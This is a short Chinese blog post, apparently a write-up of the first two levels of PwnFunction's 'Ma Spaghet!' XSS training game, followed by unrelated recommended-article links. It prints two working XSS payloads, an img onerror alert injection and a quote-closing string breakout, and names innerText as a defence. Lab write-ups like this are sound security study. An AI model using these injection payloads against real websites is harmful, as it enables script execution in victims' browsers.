一、环境
XSS Game - Ma Spaghet! | PwnFunction
二、开始闯关
第一关
看看代码
试一下直接写
明显进来了为什么不执行看看官方文档吧
你不执行那我就更改单标签去使用呗
?somebody=<img%20src=1%20onerror="alert(1)">
防御:
innerText
第二关
看看源码:
考察一个基础的闭合
?jeff=1";alert(1)//
后续待更新
xss高级靶场
凌晨五点的星2024-03-02 9:13
相关推荐
耶啵奶膘40 分钟前
uniapp-是否删除王哈哈^_^2 小时前
【数据集】【YOLO】【目标检测】交通事故识别数据集 8939 张,YOLO道路事故目标检测实战训练教程!cs_dn_Jie3 小时前
钉钉 H5 微应用 手机端调试开心工作室_kaic3 小时前
ssm068海鲜自助餐厅系统+vue(论文+源码)_kaic有梦想的刺儿4 小时前
webWorker基本用法cy玩具4 小时前
点击评论详情,跳到评论页面,携带对象参数写法:qq_390161775 小时前
防抖函数--应用场景及示例John.liu_Test5 小时前
js下载excel示例demoYaml45 小时前
智能化健身房管理:Spring Boot与Vue的创新解决方案PleaSure乐事5 小时前
【React.js】AntDesignPro左侧菜单栏栏目名称不显示的解决方案